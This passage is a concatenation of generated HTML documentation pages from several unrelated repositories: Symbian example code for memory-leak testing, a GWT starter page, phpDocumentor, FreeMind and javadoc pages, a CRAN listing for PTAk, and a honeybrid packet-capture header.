name="l00184"></a>00184 { <a name="l00185"></a>00185 <span class="comment">// Initialize and call the example code under cleanup stack.</span> <a name="l00186"></a>00186 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KMsgExampleCode,<span class="stringliteral">&quot;Symbian platform Example Code&quot;</span>); <a name="l00187"></a>00187 console = Console::NewL(KMsgExampleCode,TSize(KConsFullScreen,KConsFullScreen)); <a name="l00188"></a>00188 <span class="comment">// Put console onto the cleanup stack.</span> <a name="l00189"></a>00189 CleanupStack::PushL(console); <a name="l00190"></a>00190 <a name="l00191"></a>00191 <span class="comment">// Mark for alloc heaven tool</span> <a name="l00192"></a>00192 __UHEAP_MARK; <a name="l00193"></a>00193 <a name="l00194"></a>00194 <span class="comment">// Perform the example function under the protection of a </span> <a name="l00195"></a>00195 <span class="comment">// TRAP harness.</span> <a name="l00196"></a>00196 TRAPD(error,doExampleL()); <a name="l00197"></a>00197 <a name="l00198"></a>00198 <span class="comment">// Test the example for alloc heaven</span> <a name="l00199"></a>00199 __UHEAP_MARKEND; <a name="l00200"></a>00200 <a name="l00201"></a>00201 <span class="comment">// </span> <a name="l00202"></a>00202 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KMsgOK,<span class="stringliteral">&quot;ok&quot;</span>); <a name="l00203"></a>00203 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KFormat2,<span class="stringliteral">&quot;Overall example Trap Harness failed: leave code=%d&quot;</span>); <a name="l00204"></a>00204 <span class="keywordflow">if</span> (error) <a name="l00205"></a>00205 console-&gt;Printf(KFormat2, error); <a name="l00206"></a>00206 <span class="keywordflow">else</span> <a name="l00207"></a>00207 console-&gt;Printf(KMsgOK); <a name="l00208"></a>00208 <a name="l00209"></a>00209 <span class="comment">// Continue</span> <a name="l00210"></a>00210 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KMsgPressAnyKey,<span class="stringliteral">&quot; [press any key]&quot;</span>); <a name="l00211"></a>00211 console-&gt;Printf(KMsgPressAnyKey); <a name="l00212"></a>00212 console-&gt;Getch(); <a name="l00213"></a>00213 <a name="l00214"></a>00214 <span class="comment">// Remove the console object from the cleanupstack</span> <a name="l00215"></a>00215 <span class="comment">// and destroy it. </span> <a name="l00216"></a>00216 CleanupStack::PopAndDestroy(); <a name="l00217"></a>00217 } <a name="l00218"></a>00218 <a name="l00219"></a>00219 <a name="l00221"></a>00221 <span class="comment">//</span> <a name="l00222"></a>00222 <span class="comment">// Do the example</span> <a name="l00223"></a>00223 <span class="comment">//</span> <a name="l00224"></a>00224 <span class="comment">// Example to check robustness of class on OOM and attempt to provoke</span> <a name="l00225"></a>00225 <span class="comment">// memory leaks (orphans).</span> <a name="l00227"></a>00227 <span class="comment"></span><span class="keywordtype">void</span> doExampleL() <a name="l00228"></a>00228 { <a name="l00229"></a>00229 <span class="preprocessor"> #if defined(_DEBUG) //only ever used in debug mode</span> <a name="l00230"></a>00230 <span class="preprocessor"></span> TInt failValue = 5; <a name="l00231"></a>00231 <span class="preprocessor"> #endif</span> <a name="l00232"></a>00232 <span class="preprocessor"></span> <a name="l00233"></a>00233 <span class="comment">// Startup the alloc failure tool to fail in the third cycle.</span> <a name="l00234"></a>00234 <span class="comment">// To test for alloc heaven:</span> <a name="l00235"></a>00235 <span class="comment">//</span> <a name="l00236"></a>00236 <span class="comment">// An even value for &#39;failValue&#39; should provoke memory leak,</span> <a name="l00237"></a>00237 <span class="comment">// an odd value should not.</span> <a name="l00238"></a>00238 __UHEAP_SETFAIL(RHeap::EDeterministic,failValue); <a name="l00239"></a>00239 <a name="l00240"></a>00240 <span class="keywordflow">for</span>(TInt ii=1;ii&lt;4;ii++) <a name="l00241"></a>00241 { <a name="l00242"></a>00242 <span class="comment">// Display status information</span> <a name="l00243"></a>00243 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KFormat3,<span class="stringliteral">&quot;Cycle %d.\n&quot;</span>); <a name="l00244"></a>00244 console-&gt;Printf(KFormat3,ii); <a name="l00245"></a>00245 <span class="comment">// Create new instance </span> <a name="l00246"></a>00246 CCompound* myCompoundExample = CCompound::NewL(1,2); <a name="l00247"></a>00247 <span class="comment">// Display the instance</span> <a name="l00248"></a>00248 myCompoundExample-&gt;Display(); <a name="l00249"></a>00249 <span class="comment">// Destroy the instance</span> <a name="l00250"></a>00250 <span class="keyword">delete</span> myCompoundExample; <a name="l00251"></a>00251 } <a name="l00252"></a>00252 } <a name="l00253"></a>00253 <a name="l00254"></a>00254 </pre></div> <hr size="1"/><address style="text-align: right;"><small>Generated by&nbsp; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.2 </small></address> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
HelloWorld/war/HelloWorld.html
bigcoso/Test
<!doctype html> <!-- The DOCTYPE declaration above will set the --> <!-- browser's rendering engine into --> <!-- "Standards Mode". Replacing this declaration --> <!-- with a "Quirks Mode" doctype is not supported. --> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <!-- --> <!-- Consider inlining CSS to reduce the number of requested files --> <!-- --> <link type="text/css" rel="stylesheet" href="HelloWorld.css"> <!-- --> <!-- Any title is fine --> <!-- --> <title>Web Application Starter Project</title> <!-- --> <!-- This script loads your compiled module. --> <!-- If you add any GWT meta tags, they must --> <!-- be added before this line. --> <!-- --> <script type="text/javascript" language="javascript" src="helloworld/helloworld.nocache.js"></script> </head> <!-- --> <!-- The body can have arbitrary html, or --> <!-- you can leave the body empty if you want --> <!-- to create a completely dynamic UI. --> <!-- --> <body> <!-- OPTIONAL: include this if you want history support --> <iframe src="javascript:''" id="__gwt_historyFrame" tabIndex='-1' style="position:absolute;width:0;height:0;border:0"></iframe> <!-- RECOMMENDED if your web app will not function without JavaScript enabled --> <noscript> <div style="width: 22em; position: absolute; left: 50%; margin-left: -11em; color: red; background-color: white; border: 1px solid red; padding: 4px; font-family: sans-serif"> Your web browser must have JavaScript enabled in order for this application to display correctly. </div> </noscript> <h1>Web Application Starter Project</h1> <table align="center"> <tr> <td colspan="2" style="font-weight:bold;">Please enter your name:</td> </tr> <tr> <td id="nameFieldContainer"></td> <td id="sendButtonContainer"></td> </tr> <tr> <td colspan="2" style="color:red;" id="errorLabelContainer"></td> </tr> </table> </body> </html>
docs/packages/Command.Student.html
mrjason/mrautodata
<!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"> <meta charset="utf-8"> <title>phpDocumentor » Command\Student</title> <meta name="author" content="Mike van Riel"> <meta name="description" content=""> <link href="../css/template.css" rel="stylesheet" media="all"> <script src="../js/jquery-1.7.1.min.js" type="text/javascript"></script><script src="../js/jquery-ui-1.8.2.custom.min.js" type="text/javascript"></script><script src="../js/jquery.mousewheel.min.js" type="text/javascript"></script><script src="../js/bootstrap.js" type="text/javascript"></script><script src="../js/template.js" type="text/javascript"></script><script src="../js/prettify/prettify.min.js" type="text/javascript"></script><link rel="shortcut icon" href="../img/favicon.ico"> <link rel="apple-touch-icon" href="../img/apple-touch-icon.png"> <link rel="apple-touch-icon" sizes="72x72" href="../img/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="114x114" href="../img/apple-touch-icon-114x114.png"> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"><div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></a><a class="brand" href="../index.html">phpDocumentor</a><div class="nav-collapse"><ul class="nav"> <li class="dropdown"> <a href="#api" class="dropdown-toggle" data-toggle="dropdown"> API Documentation <b class="caret"></b></a><ul class="dropdown-menu"> <li><a>Namespaces</a></li> <li><a href="../namespaces/Auto.html"><i class="icon-th"></i> Auto</a></li> <li><a>Packages</a></li> <li><a href="../packages/Activity.html"><i class="icon-folder-open"></i> Activity</a></li> <li><a href="../packages/Auto.html"><i class="icon-folder-open"></i> Auto</a></li> <li><a href="../packages/Command.html"><i class="icon-folder-open"></i> Command</a></li> <li><a href="../packages/Default.html"><i class="icon-folder-open"></i> Default</a></li> <li><a href="../packages/Helper.html"><i class="icon-folder-open"></i> Helper</a></li> <li><a href="../packages/Question.html"><i class="icon-folder-open"></i> Question</a></li> <li><a href="../packages/symfony.html"><i class="icon-folder-open"></i> symfony</a></li> </ul> </li> <li class="dropdown" id="charts-menu"> <a href="#charts" class="dropdown-toggle" data-toggle="dropdown"> Charts <b class="caret"></b></a><ul class="dropdown-menu"><li><a href="../graph_class.html"><i class="icon-list-alt"></i> Class hierarchy diagram</a></li></ul> </li> <li class="dropdown" id="reports-menu"> <a href="#reports" class="dropdown-toggle" data-toggle="dropdown"> Reports <b class="caret"></b></a><ul class="dropdown-menu"> <li><a href="../errors.html"><i class="icon-remove-sign"></i> Errors  <span class="label label-info">43</span></a></li> <li><a href="../markers.html"><i class="icon-map-marker"></i> Markers  <ul><li>todo  <span class="label label-info">11</span> </li></ul></a></li> <li><a href="../deprecated.html"><i class="icon-stop"></i> Deprecated elements  <span class="label label-info">0</span></a></li> </ul> </li> </ul></div> </div></div> <div class="go_to_top"><a href="#___" style="color: inherit">Back to top  <i class="icon-upload icon-white"></i></a></div> </div> <div id="___" class="container"> <noscript><div class="alert alert-warning"> Javascript is disabled; several features are only available if Javascript is enabled. </div></noscript> <div class="row"> <div class="span4"> <div class="btn-group view pull-right" data-toggle="buttons-radio"> <button class="btn details" title="Show descriptions and method names"><i class="icon-list"></i></button><button class="btn simple" title="Show only method names"><i class="icon-align-justify"></i></button> </div> <ul class="side-nav nav nav-list"> <li class="nav-header"> <i class="icon-map-marker"></i> Packages</li> <li> <span class="empty-package"><i class="icon-folder-close"></i>Student</span><ul class="nav nav-list nav-packages"></ul> </li> </ul> </div> <div class="span8 package-contents"></div> </div> <div class="row"><footer class="span12"> Template is built using <a href="http://twitter.github.com/bootstrap/">Twitter Bootstrap 2</a> and icons provided by <a href="http://glyphicons.com/">Glyphicons</a>.<br> Documentation is powered by <a href="http://www.phpdoc.org/">phpDocumentor 2.0.0a12</a> and<br> generated on 2013-07-23T16:29:02-07:00.<br></footer></div> </div> </body> </html>
doxygen/html/_set_link_by_text_field_action_8java.html
mibischo/freemind
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.6"/> <title>freemind: C:/Source/freemind/freemind/modes/mindmapmode/actions/SetLinkByTextFieldAction.java File Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">freemind </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.6 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="namespaces.html"><span>Packages</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark">&#160;</span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(6)"><span class="SelectionMark">&#160;</span>Pages</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="dir_4c4d1bc5aa8884530ec95220eafe9d50.html">freemind</a></li><li class="navelem"><a class="el" href="dir_b03d79da039d07914912e7397f14ec4c.html">modes</a></li><li class="navelem"><a class="el" href="dir_30d419dbae4c910abd6a0ce0a8c3aa63.html">mindmapmode</a></li><li class="navelem"><a class="el" href="dir_f6d204bc2e34f147df653aabaa3257fc.html">actions</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#nested-classes">Classes</a> &#124; <a href="#namespaces">Packages</a> </div> <div class="headertitle"> <div class="title">SetLinkByTextFieldAction.java File Reference</div> </div> </div><!--header--> <div class="contents"> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="nested-classes"></a> Classes</h2></td></tr> <tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classfreemind_1_1modes_1_1mindmapmode_1_1actions_1_1_set_link_by_text_field_action.html">freemind.modes.mindmapmode.actions.SetLinkByTextFieldAction</a></td></tr> <tr class="separator:"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="namespaces"></a> Packages</h2></td></tr> <tr class="memitem:namespacefreemind_1_1modes_1_1mindmapmode_1_1actions"><td class="memItemLeft" align="right" valign="top">package &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="namespacefreemind_1_1modes_1_1mindmapmode_1_1actions.html">freemind.modes.mindmapmode.actions</a></td></tr> <tr class="separator:"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Tue Apr 21 2015 12:44:11 for freemind by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.6 </small></address> </body> </html>
Code/GetMetaDataFromCRAN/raw_html/PTAk.html
esander91/NamespacePollution
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CRAN - Package PTAk</title> <link rel="stylesheet" type="text/css" href="../../CRAN_web.css" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> table td { vertical-align: top; } </style> </head> <body> <h2>PTAk: Principal Tensor Analysis on k Modes</h2> <p>A multiway method to decompose a tensor (array) of any order, as a generalisation of SVD also supporting non-identity metrics and penalisations. 2-way SVD with these extensions is also available. The package includes also some other multiway methods: PCAn (Tucker-n) and PARAFAC/CANDECOMP with these extensions.</p> <table summary="Package PTAk summary"> <tr> <td>Version:</td> <td>1.2-12</td> </tr> <tr> <td>Depends:</td> <td><a href="../tensor/index.html">tensor</a></td> </tr> <tr> <td>Imports:</td> <td>graphics, stats, utils</td> </tr> <tr> <td>Published:</td> <td>2015-07-20</td> </tr> <tr> <td>Author:</td> <td>Didier G. Leibovici</td> </tr> <tr> <td>Maintainer:</td> <td>Didier G. Leibovici &#x3c;&#x63;&#x33;&#x73;&#x32;&#x69;&#x20;&#x61;&#x74;&#x20;&#x66;&#x72;&#x65;&#x65;&#x2e;&#x66;&#x72;&#x3e;</td> </tr> <tr> <td>License:</td> <td><a href="../../licenses/GPL-2">GPL-2</a> | <a href="../../licenses/GPL-3">GPL-3</a> [expanded from: GPL (&ge; 2)]</td> </tr> <tr> <td>URL:</td> <td><a href="http://c3s2i.free.fr/">http://c3s2i.free.fr/</a></td> </tr> <tr> <td>NeedsCompilation:</td> <td>no</td> </tr> <tr> <td>Citation:</td> <td><a href="citation.html">PTAk citation info</a> </td> </tr> <tr> <td>In&nbsp;views:</td> <td><a href="../../views/ChemPhys.html">ChemPhys</a>, <a href="../../views/MedicalImaging.html">MedicalImaging</a>, <a href="../../views/Multivariate.html">Multivariate</a>, <a href="../../views/Psychometrics.html">Psychometrics</a></td> </tr> <tr> <td>CRAN&nbsp;checks:</td> <td><a href="../../checks/check_results_PTAk.html">PTAk results</a></td> </tr> </table> <h4>Downloads:</h4> <table summary="Package PTAk downloads"> <tr> <td> Reference&nbsp;manual: </td> <td> <a href="PTAk.pdf"> PTAk.pdf </a> </td> </tr> <tr> <td> Package&nbsp;source: </td> <td> <a href="../../../src/contrib/PTAk_1.2-12.tar.gz"> PTAk_1.2-12.tar.gz </a> </td> </tr> <tr> <td> Windows&nbsp;binaries: </td> <td> r-devel: <a href="../../../bin/windows/contrib/3.5/PTAk_1.2-12.zip">PTAk_1.2-12.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/PTAk_1.2-12.zip">PTAk_1.2-12.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/PTAk_1.2-12.zip">PTAk_1.2-12.zip</a> </td> </tr> <tr> <td> OS&nbsp;X&nbsp;El&nbsp;Capitan&nbsp;binaries: </td> <td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/PTAk_1.2-12.tgz">PTAk_1.2-12.tgz</a> </td> </tr> <tr> <td> OS&nbsp;X&nbsp;Mavericks&nbsp;binaries: </td> <td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/PTAk_1.2-12.tgz">PTAk_1.2-12.tgz</a> </td> </tr> <tr> <td> Old&nbsp;sources: </td> <td> <a href="../../../src/contrib/Archive/PTAk"> PTAk archive </a> </td> </tr> </table> <h4>Linking:</h4> <p>Please use the canonical form <a href="https://CRAN.R-project.org/package=PTAk"><samp>https://CRAN.R-project.org/package=PTAk</samp></a> to link to this page.</p> </body> </html>
doc/html/pcap__tool_8h-source.html
tklengyel/honeybrid
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <title>honeybrid: pcap_tool.h Source File</title> <link href="tabs.css" rel="stylesheet" type="text/css"> <link href="doxygen.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generated by Doxygen 1.5.8 --> <div class="navigation" id="top"> <div class="tabs"> <ul> <li><a href="main.html"><span>Main&nbsp;Page</span></a></li> <li><a href="pages.html"><span>Related&nbsp;Pages</span></a></li> <li><a href="annotated.html"><span>Data&nbsp;Structures</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> </ul> </div> <div class="tabs"> <ul> <li><a href="files.html"><span>File&nbsp;List</span></a></li> <li><a href="globals.html"><span>Globals</span></a></li> </ul> </div> <h1>pcap_tool.h</h1><a href="pcap__tool_8h.html">Go to the documentation of this file.</a><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">/*</span> <a name="l00002"></a>00002 <span class="comment"> * This file is part of the honeybrid project.</span> <a name="l00003"></a>00003 <span class="comment"> *</span> <a name="l00004"></a>00004 <span class="comment"> * Copyright (C) 2007-2009 University of Maryland (http://www.umd.edu)</span> <a name="l00005"></a>00005 <span class="comment"> * (Written by Robin Berthier &lt;robinb@umd.edu&gt;, Thomas Coquelin &lt;coquelin@umd.edu&gt; and Julien Vehent &lt;julien@linuxwall.info&gt; for the University of Maryland)</span> <a name="l00006"></a>00006 <span class="comment"> *</span> <a name="l00007"></a>00007 <span class="comment"> * Honeybrid is free software; you can redistribute it and/or modify</span> <a name="l00008"></a>00008 <span class="comment"> * it under the terms of the GNU General Public License as published by</span> <a name="l00009"></a>00009 <span class="comment"> * the Free Software Foundation; either version 3 of the License, or</span> <a name="l00010"></a>00010 <span class="comment"> * (at your option) any later version.</span> <a name="l00011"></a>00011 <span class="comment"> *</span> <a name="l00012"></a>00012 <span class="comment"> * This program is distributed in the hope that it will be useful,</span> <a name="l00013"></a>00013 <span class="comment"> * but WITHOUT ANY WARRANTY; without even the implied warranty of</span> <a name="l00014"></a>00014 <span class="comment"> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span> <a name="l00015"></a>00015 <span class="comment"> * GNU General Public License for more details.</span> <a name="l00016"></a>00016 <span class="comment"> *</span> <a name="l00017"></a>00017 <span class="comment"> * You should have received a copy of the GNU General Public License</span> <a name="l00018"></a>00018 <span class="comment"> * along with this program; if not, see &lt;http://www.gnu.org/licenses/&gt;.</span> <a name="l00019"></a>00019 <span class="comment"> */</span> <a name="l00020"></a>00020 <a name="l00021"></a>00021 <span class="preprocessor">#ifndef _PCAP_TOOL_H_</span> <a name="l00022"></a>00022 <span class="preprocessor"></span><span class="preprocessor">#define _PCAP_TOOL_H_</span> <a name="l00023"></a>00023 <span class="preprocessor"></span> <a name="l00024"></a>00024 <span class="preprocessor">#include &lt;pcap.h&gt;</span> <a name="l00025"></a>00025 <span class="preprocessor">#include &lt;linux/netfilter.h&gt;</span> <a name="l00026"></a>00026 <span class="preprocessor">#include &lt;libnetfilter_queue/libnetfilter_queue.h&gt;</span> <a name="l00027"></a>00027 <a name="l00033"></a><a class="code" href="pcap__tool_8h.html#067b1a1ed99de594d97b4a09577174ac">00033</a> <span class="keywordtype">int</span> <a class="code" href="pcap__tool_8h.html#067b1a1ed99de594d97b4a09577174ac">pcap_record</a>; <a name="l00034"></a>00034 <a name="l00035"></a>00035 <a name="l00041"></a><a class="code" href="pcap__tool_8h.html#4e40701942ebfd0973e9d1e3295ea508">00041</a> <span class="preprocessor">#define PCAPSIZE 2048</span> <a name="l00042"></a>00042 <span class="preprocessor"></span> <a name="l00048"></a><a class="code" href="pcap__tool_8h.html#a3e2854659adba6f0af5737f4c2274e3">00048</a> pcap_t *<a class="code" href="pcap__tool_8h.html#a3e2854659adba6f0af5737f4c2274e3">pcap_main_desc</a>; <a name="l00049"></a>00049 <a name="l00050"></a>00050 <a name="l00056"></a><a class="code" href="pcap__tool_8h.html#db4b98cd91e6c95dadb7a8e6a60ef668">00056</a> pcap_dumper_t *<a class="code" href="pcap__tool_8h.html#db4b98cd91e6c95dadb7a8e6a60ef668">pcap_output_current</a>; <a name="l00057"></a>00057 <a name="l00063"></a><a class="code" href="pcap__tool_8h.html#99273a6ff244861fe51b5caa528bceb9">00063</a> pcap_dumper_t *<a class="code" href="pcap__tool_8h.html#99273a6ff244861fe51b5caa528bceb9">pcap_output_redirected</a>; <a name="l00064"></a>00064 <a name="l00065"></a>00065 <span class="keywordtype">int</span> <a class="code" href="pcap__tool_8c.html#5d1b6b8c7266a5d1b7ac6e805fa977b8" title="record a packet in the current pcap file descriptor">record_pkt</a>(<span class="keyword">struct</span> nfq_data *tb, <span class="keywordtype">char</span> *p, <span class="keywordtype">int</span> mode); <a name="l00066"></a>00066 <a name="l00067"></a>00067 <span class="keywordtype">int</span> <a class="code" href="pcap__tool_8c.html#8809f8a26967cdc4c996d596fc2262b4">close_pcap_context</a>(); <a name="l00068"></a>00068 <a name="l00069"></a>00069 <span class="preprocessor">#endif //_PCAP_TOOL_H_</span> </pre></div></div> <hr size="1"><address style="text-align: right;"><small>Generated on Tue Feb 9 10:46:07 2010 for honeybrid by&nbsp; <a href="http://www.doxygen.org/index.html"> <img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.8 </small></address> </body> </html>
docs/javadocs/app/package-use.html
ProyectoTypes/inventariohardware
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="es"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Sat Dec 20 18:25:55 ART 2014 --> <title>Uses of Package app</title> <meta name="date" content="2014-12-20"> <link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Package app"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-files/index-1.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../index.html?app/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Uses of Package app" class="title">Uses of Package<br>app</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../app/package-summary.html">app</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#app">app</a></td> <td class="colLast">&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"><a name="app"> <!-- --> </a> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation"> <caption><span>Classes in <a href="../app/package-summary.html">app</a> used by <a href="../app/package-summary.html">app</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colOne"><a href="../app/class-use/Dashboard.html#app">Dashboard</a>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-files/index-1.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../index.html?app/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
gcc-linaro/share/doc/gfortran/Introduction.html
